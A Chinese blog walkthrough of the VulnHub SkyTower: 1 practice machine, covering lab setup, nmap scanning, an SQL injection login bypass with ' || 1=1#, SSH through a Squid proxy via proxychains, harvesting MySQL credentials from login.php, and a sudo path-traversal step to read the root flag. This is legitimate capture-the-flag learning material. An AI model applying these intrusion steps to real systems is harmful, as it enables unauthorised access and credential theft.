Skytower:1复现

于 2024-09-18 20:57:07 发布
阅读量183 收藏 3
点赞数 2
分类专栏: vulnhub靶场练习 文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61982677/article/details/142343589
版权

环境搭建

SkyTower: 1 ~ VulnHub

下载解压后发现是 vdi 文件

我们需要下载VirtualBox

VM VirtualBox | 虚拟化 | Oracle 中国

一直下一步-->安装

打开点击注册,选择解压后的vbox文件

点击左上角管理

点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步

就得到了一个 iso 镜像文件

用 VMware 打开,默认网卡模式为仅主机,更改为 NAT 模式

注意:需要先右击->管理->更改硬件兼容性为下调一个版本

靶机:192.168.198.180

kali(攻击机):192.168.198.129

主机扫描

nmap -sP 192.168.198.o/24 -T4

端口扫描

nmap -sV -p- 192.168.198.180

发现开启了22、80、3128端口

漏洞探测

访问 web80 端口

发现一个登录界面

尝试 SQL 注入,邮箱随便输一个,密码使用' || 1=1#

登录成功,发现一个用户密码

Username: john
Password: hereisjohn

反弹 shell

尝试 ssh 连接

ssh john@192.168.198.180

无反应,尝试上面开放的 3128端口,可能是ssh的代理端口

挂上代理试试

vim /etc/proxychains4.conf

使用代理连接

proxychains ssh john@192.168.198.180 -t "/bin/sh"

获取到 Webshell

提权

查看当前用户权限

sudo -l

没权限,查看之前的 login 页面文件

cat /var/www/login.php

发现 mysql 数据库用户密码,尝试登录

mysql -u root SkyTech -p

登录成功,查看有哪些数据库

查看SkyTech

use SkyTech;
show tables;

select * from login;

获取 3 个用户密码

john@skytech.com    | hereisjohn   
sara@skytech.com    | ihatethisjob 
william@skytech.com | senseable

使用其他用户尝试 ssh 连接,发现 sara 有权限

proxychains ssh sara@192.168.198.180 -t "/bin/sh"

发现在 accounts 目录下有权限

sudo ls /accounts/../root

sudo cat /accounts/../root/flag.txt

发现 root 用户密码为theskytower

使用 ssh 连接 root 用户

proxychains ssh root@192.168.198.180 -t "/bin/sh"

提权成功!

LYxianyu
关注
专栏目录
vulnhub SkyTower: 1
箭雨镜屋
12-21 3035
本文思路: nmap扫描端口---->万能密码登录web,拿到john的ssh密码----->通过代理连接ssh,得到john的shell---->linpeas.sh扫描发现mysql---->通过mysql得到其他用户ssh账户密码---->用sara用户登录并通过sudo命令提权(找到root的密码)
SKYTOWER: 1超详细靶机实战
weixin_68615160的博客
07-31 463
下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox,这是官网安装到默认路径就行打开后点击注册选择解压后的vbox文件然后点击左上角管理点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步就得到了一个iso镜像文件用vmware打开默认网卡模式为仅主机,更改为nat模式。
SkyTower: 1
2301_78080214的博客
09-16 427
登录数据库,查看SKYTech库下,查询login表,获得web界面的登陆账号密码【root:root】我们可以用该方法去查看下root目录有什么文件,只需要将”cat“替换为”ls“提权失败,目前能想到的思路就是看看数据库能不能登陆 进入/var/www。测试发现无法直接连接22端口,可能需要代理跳转,现在我们设置一下代理。看一下.bashrc文件,是不是在这里配置了john不能登陆。sara用户带有(root)权限的使用,尝试用这个进行提权。继续挂代理,尝试对我们获取到的账号密码进行登录。
Skytower:1
最新发布
2301_78815619的博客
09-18 168
此时第一时间想到的是ssh登录,但是端口扫描时扫到靶机的ssh端口是被过滤的,登录不上,然后看开放的另一个3128端口,搜了一下这个端口运行的是http-proxy Squid http proxy 3.1.20,这是一个代理服务,想尝试一下能否通过这个代理服务来访问ssh的22端口。ssh连接可以在连接的时候可以执行命令,再次尝试。可以看到这里连接成功了,但是马上又自动退出了。脚本,用来存储并加载你的终端配置和环境变量。又是登录后退出,按照之前的方法再次尝试登录。文件的内容,每个用户的。
Vulnhub靶机:Skytower:1
whoami
09-14 954
Vulnhub靶机:Skytower:1实战
VulnHub-SkyTower: 1-靶机渗透学习
嗯嗯呐的博客
12-18 1302
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 靶机难度:中级(CTF) 靶机发布日期:2014年6月26日 靶机描述:该CTF是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者使用多方面方法攻击系统并获得“标志”的能力。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 信息收集 nmap扫描靶机地址 nmap扫描端口 22 SSH 80 http
vulnhub系列:SkyTower:1
jq_j37的博客
08-01 388
vulnhub系列:SkyTower:1靶机,打靶文章
Vulnhub:SkyTower:1靶机
qq_43884092的博客
03-19 148
修改/etc/proxychains4.conf,把代理指向目标的3128端口。使用弱口令:root|root,登录mysql,得到另外两个用户的密码。查看flag.txt,获得root的密码。靶机:192.168.111.236。使用ls查看root家目录下的文件。使用用户sara登录ssh。通过代理连接目标ssh。sara的sudo权限。
vulnhub-SKYTOWER: 1靶场夺旗之战
shulao2010的博客
06-11 265
成功登录成功,但是好像没进系统,用我满级英语水平翻译了一下,大概是,你已经被公司停职了,没啥用了,给你2美元*7=14块人民币,玩去吧,但是你想得到这2块钱,还得ssh登录,要不2块钱都拿不到。ssh进行连接时,超时,仔细一看nmap扫描结果,大爷的,是过滤状态,说明端口没有明确信息表明是开启还是关闭,但是没有关闭,说明有戏,但是无法访问。此时只剩下3128端口,这个是一个代理服务,那么很有可能,22端口,需要经3128服务代理之后才能访问。那咋整,蚊子也是肉,我们直接利用用户名密码尝试ssh登录。
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 252
vuluhub-skytower-1渗透靶场SkyTower 1提权
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 455
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3161
每台都做一做,然后记录在博客里.供自己和大家一起学习.
第三方软件测评机构简析:软件安全性测试的方法和流程
卓码测评
09-12 587
随着信息技术的迅猛发展,软件在各行各业的应用日益普遍,软件安全性问题也愈加凸显。近几年来,频发的数据泄露、网络攻击事件,给企业和个人带来了不可估量的损失。这使得软件安全性测试成为软件开发过程中不可或缺的重要环节。
基于大模型技术的算力产业监测服务平台设计
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot.zip
09-17
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot
吉他谱_What I've Done - Linkin Park.pdf
09-17
初级入门吉他谱 guitar tab
吉他谱_Too sweet - Hozier.pdf
09-17
初级入门吉他谱 guitar tab
Linux使用的一些笔记,包括shell命令,软件,一些实用的网站的整理_Linux_note.zip
09-17
Linux使用的一些笔记,包括shell命令,软件,一些实用的网站的整理_Linux_note
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值